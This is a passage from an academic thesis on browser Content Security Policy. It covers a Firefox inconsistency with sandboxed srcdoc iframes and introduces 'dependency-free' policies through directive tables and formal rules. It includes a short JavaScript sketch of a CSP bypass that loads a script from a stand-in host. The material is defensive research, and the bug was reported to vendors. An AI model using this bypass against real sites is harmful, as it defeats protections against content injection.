major browsers that support the srcdoc attribute. However, there is a problem when
the sandbox attribute is set on a srcdoc iframe.
WebKit-based 8 and Blink-based 9 browsers (Chrome, Chromium, Opera) always comply
with CSP. The CSP of a page applies to all srcdoc iframes, even to those iframes
which have a different origin than that of the page because they are sandboxed without
allow-same-origin.
In contrast, we noticed that in Gecko-based browsers (Mozilla Firefox), the CSP of the
page applies to the srcdoc iframe if and only if allow-same-origin is present as a
value of the sandbox attribute. Otherwise, it does not apply. The problem with this choice is
the following. A third-party script, whitelisted by the CSP of the page, can create a
srcdoc iframe, sandbox it with allow-scripts only, and load inside it any resource that would
normally be blocked by the CSP of the page. This way, the third-party
script successfully bypasses the restrictions of the CSP of the page. Even though
loading additional scripts is considered harmless in the upcoming version 3 [267,272] of
CSP, this specification says nothing about violations that could occur due to the loading of
other resources inside a srcdoc sandboxed iframe, like resources whitelisted by the object-src
directive, additional iframes, etc. A sketch of this bypass is given below.
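The sketch below illustrates the bypass just described, for the Gecko behaviour observed at the time; the script URL is a placeholder for a resource that the page's CSP would normally block.

// Hypothetical whitelisted third-party script: it creates a sandboxed srcdoc
// iframe (allow-scripts only, hence a unique origin) whose content, under the
// Gecko behaviour described above, is not subject to the page's CSP.
var frame = document.createElement("iframe");
frame.setAttribute("sandbox", "allow-scripts");
frame.setAttribute("srcdoc",
  "<script src='https://not-whitelisted.example/payload.js'><\/script>");
document.body.appendChild(frame);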
We have notified the W3C and the Mozilla Security Group. Daniel Veditz, a lead at the
Mozilla Security Group, recognizes this as a bug and explains:
Our internal model only inherits CSP into same-origin frames (because in the-
ory you’re otherwise leaking info across origin boundaries) and iframe sandbox
creates a unique origin. Obviously we need to make an exception here (I think
we manage to do the same thing for src=data: sandboxed frames).
CSP specification and srcdoc iframes The problem of imposing a CSP on an unknown
page is illustrated by the following example [271]. If a trusted third-party library,
whitelisted by the CSP of the page, uses security libraries inside an isolated context (by
sandboxing them in a srcdoc iframe, with allow-scripts as the sole value of the sandbox attribute),
then the page’s CSP will block the security libraries and possibly introduce new vulnerabilities.
Because of this, it was unclear to us what the intent of the CSP designers regarding
srcdoc iframes was. Mike West, one of the CSP editors at the W3C and also a Developer
Advocate on Google Chrome’s team, clarified this to us:
I think your objection rests on the notion of the same-origin policy preventing
the top-level document from reaching into it’s sandboxed child. That seems
accurate, but it neglects the bigger picture: srcdoc documents are produced
entirely from the top-level document context. Since those kinds of documents
are not delivered over the network, they don’t have the opportunity to deliver
headers which might configure their settings. We impose the parent’s policy in
these cases, because for all intents and purposes, the srcdoc document is the
parent document.
8. https://en.wikipedia.org/wiki/WebKit
9. https://en.wikipedia.org/wiki/Blink_(web_engine)
6 Conclusion
In this work, we have revealed a new problem that can lead to violations of CSP. We have
performed an in-depth analysis of the inconsistency that arises between CSP and SOP and
identified three cases in which CSP may be violated.
To evaluate how often such violations happen, we performed a large-scale analysis of more
than 1 million pages from the 10,000 Alexa top sites. We found that 5.29% of sites contain
pages with CSPs (as opposed to 2% of home pages in previous studies).
We also found that 72% of current web pages with CSP are potentially vulnerable
to CSP violations. This concerns 379 (72.46%) of the sites that deploy CSP. Further analyzing
the contexts in which those web pages are used, our results show that when a parent page
includes an iframe from the same origin according to SOP, in 23.5% of cases their CSPs
may be violated. And in the cases where document.domain is required in both the parent and
the iframe, we identified that such violations may occur in 94% of the cases.
We discussed measures to avoid CSP violations in web applications, namely installing an origin-wide
CSP and using sandboxed iframes. Finally, our study reveals an inconsistency in
browsers’ implementations of CSP for srcdoc iframes, which appeared to be a bug in the Mozilla
Firefox browser.
Chapter 4
DF-CSP: Dependency-Free Content Security Policy
Preamble
In this chapter, we analyze CSP versions and browser implementations, formalize their
differences as dependencies, and propose rewriting rules and a tool for building dependency-free
policies (DF-CSP).
This chapter is currently under submission.
1 Introduction
From a web application developer’s perspective, deploying a CSP that is effective at mitigating
content injection attacks while preserving the full functionality of the application can
quickly become challenging, for many reasons.
First of all, a good understanding of the global meaning of CSP is important. For instance,
in order to set restrictions on the origins of trusted scripts, one uses the script-src
directive. Nonetheless, it is known that plugins, in particular Adobe Flash plugins, can
execute scripts in web pages. Hence, if no restrictions are set on plugins (if plugins can
load from any origin), then an attacker can inject a malicious plugin from an origin not
whitelisted by the script-src directive and execute scripts in the page after the plugin
loads, as demonstrated by Weichselbaum et al. [267]. Also important is the
case of the sandbox directive, which, when used in a policy, alters the semantics of many
other directives. For instance, its mere presence in a policy automatically prevents plugins,
even if the object-src directive is used to specify a set of trusted origins for plugins.
        New directives                                              Deprecated
CSP1    connect-src, default-src, font-src, frame-src, img-src,     n/a
        media-src, object-src, script-src, style-src, sandbox,
        report-uri
CSP2    base-uri, child-src, form-action, frame-ancestors,          frame-src
        plugin-types
CSP3    disown-opener, manifest-src, report-to, worker-src          child-src, report-uri
Table 4.1 – CSP directives by version
The meaning of a CSP policy also depends on the version of the standard that the browser
implements. There are three versions of the CSP standard [261,272,275], with CSP3 [272]
being the most recent one (see Table 4.1 for a summary of the changes among versions).
Each new version builds on the previous ones, with its own set of changes, potentially backwards
incompatible with earlier versions, but with the aim of improving the effectiveness of the
specification and its ease of adoption by web application developers. In particular, a major
feature at the heart of CSP3 is the concept of trust propagation, for easily loading dynamic
scripts. This is achieved with the introduction of the new ’strict-dynamic’ keyword, to be
used with the script-src directive [267]. Its semantics is that a script whitelisted
with a nonce or a hash is allowed to further load any additional scripts, even though such
scripts are not explicitly whitelisted in the policy. From a security perspective, the use
of ’strict-dynamic’ can give attackers different power depending on the version of CSP
considered. In fact, an attacker who compromises a trusted script can load arbitrary scripts
if the underlying browser supports CSP3, but not in CSP1- and CSP2-compliant browsers,
where the attacker is bound by the whitelisted origins 1.
Moreover, browser vendors follow the evolution of the CSP specification at their own pace.
While some of them quickly take up the latest improvements to the specification, others
simply do not support it at all, or support it only partially. To add to this complexity,
CSP does not offer developers the possibility to deliver different CSP policies according
to the version of CSP that the client’s browser implements. Rather, the policy deployed
by the application will be interpreted by the browser according to whichever version of
CSP it supports. This leads to different meanings for a single CSP, depending on the
browser’s implementation.
Ultimately, web applications would have to maintain multiple policies, one per browser.
Then, when a web page is accessed, the user agent would be detected in order to serve the
appropriate CSP. Maintaining multiple policies is potentially error-prone, as one has to
keep all of them updated and effective against attacks while preserving the full functionality
of web applications. Moreover, correctly detecting the user’s browser is crucial, as not
delivering the right policy may break the application’s normal functionality or fail to
mitigate content injection attacks. Unfortunately, detecting the user’s browser is not
trivial, as this information can potentially be controlled by an attacker. For instance,
browser extensions, which are very popular among users, are able to modify HTTP
headers. Thus, they can present to web servers a user agent which has nothing to do with
the effective browser of the user. As a matter of fact, we installed the User-Agent Switcher
for Chrome [147] extension on Chrome 68.0.3440.75. By changing the User-Agent to
Opera 12.14, Facebook and Twitter stopped sending any CSP with their responses, while
they sent a CSP in a normal setting. This leaves the application unprotected against
content injection attacks, even though the underlying browser is fully CSP-compliant.
In this work, we introduce the notion of dependency-free policies (DF-CSP), for web
application developers to write and deploy policies that preserve the full functionality of
web applications and that are effective at mitigating attacks, irrespective of the browser in
which the application runs and the version of CSP supported by the browser. By building
and deploying a DF-CSP, a web application developer maintains only a single policy and
always serves the same CSP to all browsers, without relying on user agent detection, which
could potentially be controlled by an adversary.
We scrutinize the CSP standard and perform tests in browsers to assess their implementation
of the specification; we then formalize the implicit relations between directives that we
find, and refer to them as dependencies. We formally define the notion of dependency-free
policies (DF-CSP) and propose a set of provably correct rewriting rules that can be used to
resolve dependencies in order to build dependency-free policies. These rules are mostly meant for developers
1. The attacker cannot read nonces, but can control the URLs of parser-inserted scripts
willing to ensure that their policies will be enforced similarly in different browsers. Some
of our rewriting rules, in particular those related to the sandbox directive, which alters the
semantics of many directives, can also be implemented by browser vendors to comply with
the specification. As a matter of fact, we found no browser correctly implementing the
sandbox directive.
Dependency-free policies are also useful to reason about CSP policies with the formal
semantics of Calzavara et al. [179], which calculates the global meaning of a CSP policy by
adding the meanings of each individual directive. In this formal semantics, the global
semantics of a CSP policy follows from the semantics of individual directive values. This
is, however, only correct if the CSP does not present any dependencies, because the
meaning of individual directives could be altered by other directives.
Finally, we discuss the security implications of the use of ’strict-dynamic’ in policies. In
fact, the use of ’strict-dynamic’ in backwards-compatible policies such as DF-CSP can
give attackers different attack power depending on the version of CSP considered, especially
in CSP3, where an attacker could potentially inject arbitrary content into the application.
We show that automatically generating a second policy out of a policy that makes use of
’strict-dynamic’ successfully ensures that an attacker who compromises a script allowed
by a DF-CSP does not gain more power, irrespective of the browser in which the application
executes.
To assess how many sites in the wild could potentially benefit from building DF-CSP, we
collected and analyzed the CSPs of the top 100k Alexa sites. The results show that thousands
of these websites can benefit from our rewriting rules for building dependency-free policies,
either because they maintain multiple policies, or because they deploy CSPs that exhibit
some of the dependencies we have formalized (see Table 4.7 for the results). To help
build DF-CSP, we propose a new tool to assist developers in (1) building effective policies
based on the state of the art and (2) understanding the global meaning of their CSP policies
by means of semantics and directive dependencies.
In summary, towards a better understanding of the global meaning of CSP policies, we
make the following contributions:
— we identify, define, and formalize directive dependencies. These are sets of directives
whose implicit relations and individual meanings can lead to policies being interpreted
differently depending on the version of CSP and the browser implementation under
consideration. In doing so, we find problems in the CSP formal semantics and in browsers'
implementations of CSP.
— we propose and implement a rewriter (a set of rewriting rules) for building dependency-
free policies (DF-CSP), whose semantics are independent of any particular CSP version
or browser implementation. At the core of DF-CSP is the mitigation of attacks as well
as the preservation of the full functionality of web applications.
— we discuss how to deploy backwards-compatible policies such as DF-CSP, along with
the ’strict-dynamic’ keyword, without giving attackers more power in case they
compromise a trusted script. Automatically generating and deploying a second policy
out of a DF-CSP that uses ’strict-dynamic’ successfully prevents an attacker from
gaining more power, even in CSP3-compliant browsers.
— we collect and analyze the CSPs of the top 100k Alexa sites, and find that sites
in the wild often deploy non-dependency-free policies, giving a lower bound on the
number of web applications which may benefit from our DF-CSP. In other words,
either they serve the same CSP, in which case their policy is not a DF-CSP, or they
serve different CSPs based on the User-Agent we sent, in which case they maintain
different policies for different browsers, meaning that they do not deploy DF-CSP.
— we implement a new tool to assist developers in building effective policies. The tool
is meant to assist developers in building a DF-CSP, or refactoring their policies in order
to make them DF-CSP. Since CSP is primarily meant to mitigate content injection
attacks, we start with rules that focus on script execution, then build around them
in order to obtain a final CSP. Even though the refactored CSP could be different from
the original one, the rewriting rules do not introduce new vulnerabilities, as we put
the mitigation of malicious script execution at the core of these rules.
2 Context and problems
2.1 Directives and their values in different CSP versions
Directives in CSP versions
Table 4.1 presents CSP directives and the version in which they were initially intro-
duced. To start with, CSP1 [261] introduced 11 directives. Each directive targets a
specific type of content, and can thus be used to restrict the origins from which content of
that particular type can be loaded. For instance, the script-src directive specifies trusted
origins from which scripts can be loaded. The default-src directive is used as a fall-
back for *-src directives (directives whose names end with -src). When default-src is
present in a policy and any of the directives which fall back to it is not specified, then the
missing directive implicitly inherits the restrictions (values) of default-src. This directive
helps, for instance, to apply the same restrictions to many directives at a time, without
explicitly specifying them. CSP2 [275] introduced some additional directives, in particular
child-src, to replace frame-src. Starting from this version, it is possible to set restric-
tions on trusted origins for form submission (form-action directive), on the origins of web
applications allowed to embed the application as an iframe (frame-ancestors), and on the
origins of URLs that can be used as values for the <base> tag (base-uri). In this version, the
plugin-types directive has also been introduced. The plugin-types directive expresses
the types of plugins that the application trusts (PDF, Java applets, Adobe Flash plugins,
etc.). The trusted origins for the plugins themselves are specified with the object-src directive.
CSP3 [272], currently under development, introduces some changes w.r.t. CSP2. In par-
ticular, it splits the child-src directive into frame-src (for frames) and a new directive
worker-src (for workers), then deprecates child-src itself. The report-to directive has
also been introduced to replace report-uri. The manifest-src directive makes it possible
to specify the trusted origins of web application manifests.
Directive values The semantics of directive values (trusted origins) has evolved between
previous versions and CSP3. In CSP1 and CSP2, an insecure HTTP origin allows
content only from that exact origin. In CSP3, an HTTP origin also allows content from its
secure HTTPS counterpart.
Nonces and hashes have been introduced in CSP2 to allow the whitelisting of individual
inline scripts and stylesheets, instead of using the ’unsafe-inline’ keyword, which removes
any protection against attacks. Nonces can also be used to whitelist individual URLs. In
CSP2, a script is allowed to load if its origin is whitelisted in the policy, or if the script
has a valid nonce or hash. A major feature at the heart of CSP3 is the concept of trust
propagation to easily load dynamic scripts. This is achieved with the introduction of
the new ’strict-dynamic’ keyword to be used with the script-src directive. With
’strict-dynamic’, a script which is whitelisted with a nonce or a hash is allowed to
further load any additional scripts, even though such scripts are not explicitly whitelisted
in the policy. This has implications from a security perspective. If the following policy is
deployed:
script-src ’nonce-abcdef’ ’strict-dynamic’ ’self’ https://trusted.com; object-src ’none’;
— Browsers supporting CSP3 will enforce ’nonce-abcdef’ ’strict-dynamic’. An
attacker who can control the URLs of dynamically injected scripts can inject and
execute arbitrary scripts in the application, including from any attacker-controlled
origin. This is due to the use of ’strict-dynamic’, which enables scripts to load
any additional scripts they require.
— CSP2-compliant browsers will enforce ’nonce-abcdef’ ’self’. The attacker can
only inject content from the page's own origin (’self’), which is anyway already trusted
since it is whitelisted in the CSP of the page. The attacker cannot inject arbitrary
scripts, as in the case of CSP3. Note that if we consider an attacker who is able to
read the DOM, and therefore the nonces, then this attacker can also inject arbitrary
scripts, as in the case of CSP3.
— Finally, in CSP1-compliant browsers, ’self’ will be enforced. As in the case of CSP2,
the attacker can only inject scripts from the page's own origin (’self’). Therefore,
he cannot inject arbitrary scripts as in the case of CSP3.
Therefore, an attacker who manages to compromise a trusted script gains different power
in the content that he can further inject. As one can see, even though ’strict-dynamic’
eases CSP adoption by making it easy to load dynamic content, the attacker's power under a
nonce-based policy (CSP3) is unlimited, compared to origin-based policies (CSP2, CSP1),
in which the attacker is bound by the explicit permissiveness of the policy.
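To make this concrete, the following is a rough Python sketch (ours, not part of the chapter) of why the same script-src value ends up being enforced differently: each CSP level simply ignores the source expressions it does not know, and with CSP3 the presence of ’strict-dynamic’ additionally disables host sources and ’self’. The keyword sets and the filtering function are illustrative only.

# Illustration: which script-src source expressions each CSP level retains.
UNKNOWN = {
    1: {"'strict-dynamic'", "nonce", "hash"},  # CSP1: no nonces, hashes, strict-dynamic
    2: {"'strict-dynamic'"},                   # CSP2: 'strict-dynamic' not known
    3: set(),                                  # CSP3: all of the above are known
}

def enforced_script_src(values, level):
    def known(v):
        if v.startswith("'nonce-"):
            return "nonce" not in UNKNOWN[level]
        if v.startswith(("'sha256-", "'sha384-", "'sha512-")):
            return "hash" not in UNKNOWN[level]
        return v not in UNKNOWN[level]

    kept = [v for v in values if known(v)]
    if level == 3 and "'strict-dynamic'" in kept:
        # 'strict-dynamic' makes a CSP3 browser ignore host sources and 'self'
        kept = [v for v in kept if v.startswith(("'nonce-", "'sha", "'strict"))]
    return kept

policy = ["'nonce-abcdef'", "'strict-dynamic'", "'self'", "https://trusted.com"]
for level in (1, 2, 3):
    print(level, enforced_script_src(policy, level))
# 1 ["'self'", 'https://trusted.com']
# 2 ["'nonce-abcdef'", "'self'", 'https://trusted.com']
# 3 ["'nonce-abcdef'", "'strict-dynamic'"]

This is only a filtering view of the policy string; the actual attacker power that results from each interpretation is the one discussed in the bullets above.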
2.2 Problems with browser support
As mentioned in the introduction, browser implementations can lead to different interpre-
tations of CSP.
The sandbox directive is not well supported in browsers We found no browser
correctly supporting the sandbox directive. We filed bugs with the vendors of all the browsers
we tested (Chrome 66, Chromium 60, Firefox 59, Opera 52, Safari 9.1.3). The sandbox
directive has been introduced in CSP1 to provide protected applications with the same
restrictions as the sandbox attribute for iframes in the HTML specification². Depending
on the presence or absence of its related flags, the sandbox directive alters the semantics
of many other directives. First of all, its mere presence in a CSP prevents plugins from
loading (object-src, plugin-types). By default, script execution (script-src) and form
submission (form-action) are also prevented, and the ’self’ keyword in directives does
not allow content from the page's own origin, because the sandbox directive creates a unique
origin. Restrictions on scripts, forms, and ’self’ can be relaxed if the allow-scripts,
allow-forms, and allow-same-origin flags (values) of the sandbox directive are specified,
respectively.
All the browsers we tested misimplement the sandbox directive when it lacks the
allow-same-origin flag. In this situation, ’self’ must not match the page's own origin. In
Firefox, Opera, Chromium, and Safari, the ’self’ keyword in all directives still matches
the page's own origin. In Chrome, only ’self’ in script-src still matches the page's own
origin.
2. https://www.w3.org/TR/html50/embedded-content-0.html#attr-iframe-sandbox
Firefox does not support the plugin-types directive and other problems Firefox
does not support the plugin-types directive, which was introduced in CSP2. On Firefox,
then, restrictions on the types of plugins will be ignored, therefore allowing all types of plu-
gins from origins whitelisted by the object-src directive of the policy. CSP3 is still a working
draft, but Chrome, Opera and Firefox already implement some of its features, in partic-
ular the ’strict-dynamic’ keyword. Nonetheless, we found and reported to Mozilla
that the ’strict-dynamic’ keyword is ignored when it is specified in default-src. Since
’strict-dynamic’ is meant for the script-src directive, adding it directly to
script-src or to default-src should have the same effect, since default-src is
a fallback directive for script-src. Finally, Internet Explorer 10 only supports the sandbox
directive, and no other CSP directives [21].
Flash plugins can load scripts Plugins extend browsers' capabilities by allowing them
to render content that is not a traditional HTML document. Well-known plugins are
Adobe Flash and Java Applets. It is well known that Flash plugins in particular can
execute scripts in the context of web applications. Therefore, in browsers which allow
Flash plugins, the restrictions set on scripts must be understood as those allowed by both the
script-src and object-src directives, in case Flash plugins are allowed to execute. This
has been demonstrated by Weichselbaum et al. [267]. However, while the
authors suggest that CSPs must not allow plugins, we rather argue that plugins can be
allowed to load, even Flash plugins, as long as the object-src directive does not allow
more origins than the script-src directive. In this case, even though Flash plugins can
execute scripts, this is done from origins which are already allowed by the script-src
directive.
The fact that plugins can execute scripts also has an impact on workers (child-src,
worker-src) and connections (connect-src). In fact, connections and workers are
JavaScript APIs that require script execution to be enabled before they can be used. Hence,
in browsers not supporting Flash plugins, when (normal) scripts (script-src) cannot
execute, then workers cannot load either, and connections cannot be made. However, as
we have shown, if scripts are not allowed while plugins are allowed, browsers supporting
Flash can still execute scripts, and consequently load workers or make connections to origins
that are whitelisted in the CSP.
Scripts can load fonts Traditionally, fonts (font-src) are included in web applications
via the @font-face property of stylesheets (style-src). Hence, if stylesheets cannot load
(style-src ’none’), fonts cannot be loaded via stylesheets either, even though the
font-src directive whitelists origins from which fonts may be loaded. However, the W3C
is currently working on an API for allowing fonts to also be loaded via scripts (script-src,
and object-src because of Flash plugins). Known as the CSS Font Loading API or FontFace
API [43], it is already provided by many browsers (Chrome, Firefox, Safari, Opera) for scripts to
load fonts. Hence, fonts can be loaded via stylesheets in all browsers, and also via scripts
in browsers supporting the FontFace API.
2.3 Goal: is my CSP effective?
CSP has three versions, and even when browsers support the same version, they provide dif-
ferent implementations of it. Moreover, CSP does not make it possible to deploy different
CSPs and clearly state to each browser which one it should enforce, according to its im-
plementation and the version of CSP it supports. Rather, the policy which is deployed will
be interpreted by different browsers according to their implementation and the version of
CSP they support. It is the responsibility of the developer to ensure that, irrespective of the
browser in which her application will run and which version of CSP it implements, the CSP
deployed will preserve the functionality of the application and effectively protect it
against content injection attacks. This is a particularly daunting task, given the
differences (and sometimes incompatibilities) in the semantics of CSP between CSP
versions, the versions that browsers support, and how well they support them.
Our goal is to address the challenges in deploying backwards-compatible and effective
CSPs, considering the differences and incompatibilities of semantics between CSP ver-
sions, browser support, and implementations. We propose tools to assist in building and
enforcing such policies.
To address the semantics challenges, we introduce the concepts of CSP directive depen-
dencies and dependency-free policies (DF-CSP). With directive dependencies, we formalize
the differences in semantics and the relations and influences between directives and their val-
ues, considering the different versions of the specification and browser implementations.
Then, we introduce a rewriter, a set of rules for resolving dependencies. We prove
that the rewriter successfully produces dependency-free policies. These are policies whose
semantics are preserved across different CSP versions and browser implementations. We
also discuss the security of CSP and DF-CSP, especially in the presence of ’strict-dynamic’
in the script-src directive. While the use of this keyword eases CSP adoption by making it
easy to load dynamic scripts, it also gives an attacker unlimited power in case he can control
the URLs of dynamically injected scripts. We demonstrate that deploying two policies limits
an attacker's power, even in case of a compromise of a trusted script.
3 Directives dependencies
In this section, we identify and formalize the different dependencies between directives. We
consider three scenarios. First of all, to be comprehensive, we consider all three CSP versions
and their current implementations in browsers, as we know of them. In a second scenario,
we consider only CSP2 and CSP3, which are widely supported by major browsers. Finally,
we consider CSP2 and CSP3 according to their specifications only, without considering the
different browser implementations.
3.1 CSP core syntax
For formalization purposes, we provide a CSP core syntax that represents a core of all three
CSP versions. For the sake of simplicity, we consider only well-formed policies, as
defined below. Dealing with well-formed policies helps us abstract from the complexity of the
CSP syntax. Finally, we define a directive lookup operator which, given a policy and a directive
name, returns its set of values (e.g., the trusted origins associated with the script-src directive
if it is specified in the policy).
We borrow some of the notation and terms from a formalization of the semantics of CSP2
provided by Calzavara et al. [179]. However, in many cases the definitions of the concepts
differ, because the scope of our work is different from theirs. While they studied the
semantics of individual directive values, we are interested in the global meaning of CSP,
and the dependencies between the directives themselves. Understanding the global meaning
of CSP and resolving directive dependencies is useful prior to accurately analyzing the
formal semantics of CSP as done in [179].
The core CSP syntax is shown in Table 4.2. This syntax is sufficient to illustrate our
formalization.
Source expressions   se ::= https: | ’self’ | ...
Directive name       t  ::= script-src | object-src | ...
Directive values     v  ::= {se1, ..., sen} | {’none’}
Directive            d  ::= t v
Policy               p  ::= d⃗
Table 4.2 – CSP Core Syntax
A CSP policy p is a set of directives d⃗. CSP directives are all predefined, and include
for instance script-src, object-src, img-src (see also Table 4.1). Directive values
are a set of source expressions seᵢ that depend on the type of directive. They include ori-
gins (e.g. https://trusted.com, trusted.com, *.trusted.com), schemes (e.g. https:),
and keywords (e.g. ’self’, ’none’, allow-scripts). The special value {’none’} means that
the directive does not allow any content. The special directive default-src is a fallback
for many other directives (script-src, img-src, object-src, connect-src, ...). In other
words, when a directive that falls back to default-src is not specified in a policy, its
values resolve to the default-src directive values. We assume that there is a set fd of
directives that fall back to default-src.
Well-formed policies
By well-formed policies, we mean policies which:
— contain only known directives, given in the specification. In reality, nothing prevents
a policy from including unknown directives. They will be ignored by browsers when
the policy is enforced. We also consider only directives that set restrictions on the
origins from which content can be loaded. This explains why we do not consider, for
instance, the disown-opener directive of CSP3 [272].
— contain only directive values allowed by the specification. In practice, directive
values which are not known will be ignored by browsers when enforcing the policy.
For the sake of simplicity, we do not model nonces and hashes in the formalization, as
they can refer to content from an arbitrary origin. This is difficult to reason about; in
particular, it is impossible to statically compare the restrictions of two directives which
use nonces or hashes without any information on the content they will refer to
at runtime.
— do not duplicate directives. The specification makes it possible to have a directive
repeated multiple times within a single policy. In this case, browsers will consider
only the first instance of the directive and its related values. Other occurrences will
be ignored.
— are not a conjunction of multiple policies. The specification allows more than one
policy to be specified for enforcement. In practice, browsers will enforce both of them,
but separately. In this case, content must be allowed by both policies in order to
load in an application.
— have directive values expanded to accommodate the modifications introduced by
CSP3, in particular that insecure origins also match their secure counterparts. CSP3
enforcement allows the secure counterparts of insecure origins. For instance, the origin
http://example.com allows both content from http://example.com and
https://example.com.
— do not contain redundant directive values. For instance, a directive with
*.example.com *.sub.example.com as values presents redundancies, because
*.sub.example.com is already allowed by *.example.com.
We assume the existence of a function for building well-formed policies. In practice, we
have provided an implementation of such a function (see Section 5).
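For illustration, here is a minimal Python sketch (ours, not the implementation referred to in Section 5) of such a normalization function. It handles three of the bullets above: unknown directives, duplicated directives, and CSP3's expansion of insecure origins; the directive list and all names are assumptions of this sketch.

KNOWN_DIRECTIVES = {
    "default-src", "script-src", "object-src", "style-src", "img-src",
    "font-src", "media-src", "connect-src", "frame-src", "child-src",
    "worker-src", "manifest-src", "form-action", "frame-ancestors",
    "base-uri", "plugin-types", "sandbox",
}

def well_formed(header):
    """Turn a raw CSP header value into a (partially) well-formed policy dict."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if not tokens:
            continue
        name, values = tokens[0].lower(), set(tokens[1:])
        if name not in KNOWN_DIRECTIVES or name in policy:
            continue                      # unknown or duplicated: ignored
        for v in list(values):
            if v.startswith("http://"):   # CSP3: insecure origin also matches https
                values.add("https://" + v[len("http://"):])
        policy[name] = values
    return policy

print(well_formed("script-src http://example.com; script-src evil.com; foo bar"))
# the duplicate script-src and the unknown directive 'foo' are dropped,
# and https://example.com is added next to http://example.com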
Lookup operator
We define a lookup operator which, given a policy and a directive, returns the allowed
values corresponding to that individual directive only.
Definition 1 (Lookup). Given a policy expressed as a list of directives d⃗ and a directive
name t, the lookup operator d⃗(t) is defined as follows:

d⃗(t) =
  v     if t v ∈ d⃗
  v     if default-src v ∈ d⃗ ∧ t ∈ fd
  ⊥     if t ∈ {plugin-types, sandbox}
  {∗}   otherwise
When a directive is present, the lookup operator returns its set of values as defined in the
policy. Otherwise, if the default-src directive is present in the policy and the directive
being looked up falls back to default-src, then it returns the default-src directive
values. If neither of the two cases is true, then no particular restrictions are set on the
directive. We resolve the value of the missing directive to a special value depending on the
type of directive:
— ⊥ means that the directive is missing from the policy (possible cases are the plugin-types
and sandbox directives).
— {∗} is a special value that means any content is allowed. It is returned when the
missing directive allows content of a certain type (scripts, images, stylesheets). These
are basically the directives that may fall back to default-src (if default-src is present
in d⃗), in addition to form-action, frame-ancestors, and base-uri.
We distinguish plugin-types and sandbox from other directives, first because the values
of the plugin-types and sandbox directives are only composed of keywords such as
allow-same-origin or application/pdf, while the values of other directives can also be origins.
Additionally, the other directives can be present in a policy with {∗} as a value to mean
that they allow content from any origin. In other words, to express that, for instance, images are
allowed from any origin, one can either omit the img-src directive (and the default-src
directive) from a policy, or add the img-src directive (or the default-src directive) to the
policy with its value set to {∗}.
However, the only way to allow any type of plugin is to omit the plugin-types directive,
because there is no special value like {∗} that can be given to the plugin-types directive
in order to allow plugins of any type. Similarly, once the sandbox directive is used in a
policy, there is no special value like {∗} to relax all the restrictions of the directive. As a
matter of fact, while allow-scripts re-enables scripts that the sandbox directive had prevented,
there is no similar flag to re-enable plugins once the sandbox directive is used, apart from
removing it from the policy.
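To make the lookup operator concrete, here is a minimal sketch in Python, assuming policies are represented as dictionaries mapping directive names to sets of source expressions. The set FD below stands for the set fd of fallback directives (abbreviated); function and variable names are ours.

FD = {"script-src", "object-src", "style-src", "img-src", "font-src",
      "media-src", "connect-src", "frame-src", "child-src", "worker-src",
      "manifest-src"}

def lookup(policy, t):
    """The values of directive t in the policy, following Definition 1."""
    if t in policy:                           # t v is in the policy
        return policy[t]
    if "default-src" in policy and t in FD:   # fallback to default-src
        return policy["default-src"]
    if t in ("plugin-types", "sandbox"):      # bottom: the directive is absent
        return None
    return {"*"}                              # no restriction at all

policy = {"default-src": {"trusted.com"}, "img-src": {"'self'"}}
print(lookup(policy, "script-src"))   # {'trusted.com'}  (falls back to default-src)
print(lookup(policy, "sandbox"))      # None
print(lookup(policy, "form-action"))  # {'*'}  (no restriction)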
(D1) ∀ t ∈ {frame-ancestors, base-uri, manifest-src}, v = d⃗(t) ⇒ v = {∗}
(D2) sandbox v ∈ d⃗ ∧ v′ = d⃗(object-src) ⇒ v′ = {’none’}
(D3) sandbox v ∈ d⃗ ∧ allow-scripts ∉ v ∧ v′ = d⃗(script-src) ⇒ v′ = {’none’}
(D4) v′ = d⃗(form-action) ⇒ (sandbox v ∈ d⃗ ∧ allow-forms ∉ v ⇒ v′ = {’none’})
     ∧ (((sandbox v ∈ d⃗ ∧ allow-forms ∈ v) ∨ sandbox v ∉ d⃗) ⇒ v′ = {∗})
(D5) sandbox v ∈ d⃗ ∧ allow-same-origin ∉ v ⇒ ∀ t v′ ∈ d⃗, ’self’ ∉ v′
(D6) v = d⃗(frame-src) ∧ v′ = d⃗(child-src) ⇒ v = v′
(D7) v = d⃗(script-src) ∧ v′ = d⃗(child-src) ∧ v″ = d⃗(worker-src) ⇒ v = v′ ∧ v = v″
(D8) plugin-types v ∈ d⃗ ∧ v′ = d⃗(object-src) ⇒ v′ = {’none’}
(D9) v = d⃗(object-src) ∧ v′ = d⃗(script-src) ⇒ v ⊆ v′
(D10) v = d⃗(script-src), v′ = d⃗(object-src). v = {’none’} ⇒ v′ = {’none’}
      ∨ (∀ t ∈ {connect-src, child-src, worker-src}, v″ = d⃗(t) ⇒ v″ = {’none’})
(D11) v = d⃗(style-src), v′ = d⃗(font-src). v = {’none’} ⇒ v′ = {’none’}
      ∨ (∀ t ∈ {script-src, object-src}, v″ = d⃗(t) ⇒ v″ = {’none’})
Table 4.3 – Formalization of Dependency-Free Policies (DF-CSP) considering CSP1, CSP2
and CSP3 versions and their implementations in browsers.
3.2 Formalization of DF-CSP considering CSP1, CSP2, CSP3 and browser implementations
Table 4.3, which is explained in the following subsections, shows a formalization of suf-
ficient conditions for CSP policies to be directive-dependency free. The symbols ⊆, ∈, ∉,
⇒, ∧, and ∀ are standard, with the usual meanings of set inclusion and membership, logical
implication, conjunction, and universal quantification. Using the conditions of Table 4.3, we
can define a dependency-free policy (DF-CSP). Intuitively, a policy is dependency-free when
all the conditions D1, ..., D11 hold.
Definition 2 (DF-CSP). A policy d⃗ is dependency-free (DF-CSP) iff ∀ i ∈ {1, ..., 11}, Di
holds.
The table implicitly defines dependencies: there is a dependency between directives in a
CSP policy d⃗ when a condition Di does not hold. For example, D9 states that there is
a dependency between object-src and script-src if the object-src directive is more
permissive than the script-src directive.
We classify the dependencies into four categories. Backwards-incompatible directives are those
which do not have an equivalent directive in other versions of the specification. For instance,
form-action was introduced starting from CSP2, and is therefore not known in
CSP1. We then provide the semantics of the sandbox directive as it should be implemented
by browsers. Then, we turn to directives which have different meanings in different CSP
versions, and to content types which are governed by different directives in different versions
of the specification. Finally, we discuss dependencies due to browsers' implementations
of CSP, the APIs they provide, and their influence on the semantics of a policy.
Backwards incompatible directives
This concerns directives which are only known in a specific version of the CSP specification,
and do not have any equivalent in other versions. When these directives are present
in a policy, they will be enforced only in the versions of CSP in which they are known.
In other versions, they will be ignored, leading to a different semantics. This includes
frame-ancestors and base-uri, which were introduced in CSP2, and manifest-src,
which is newly introduced in CSP3³.
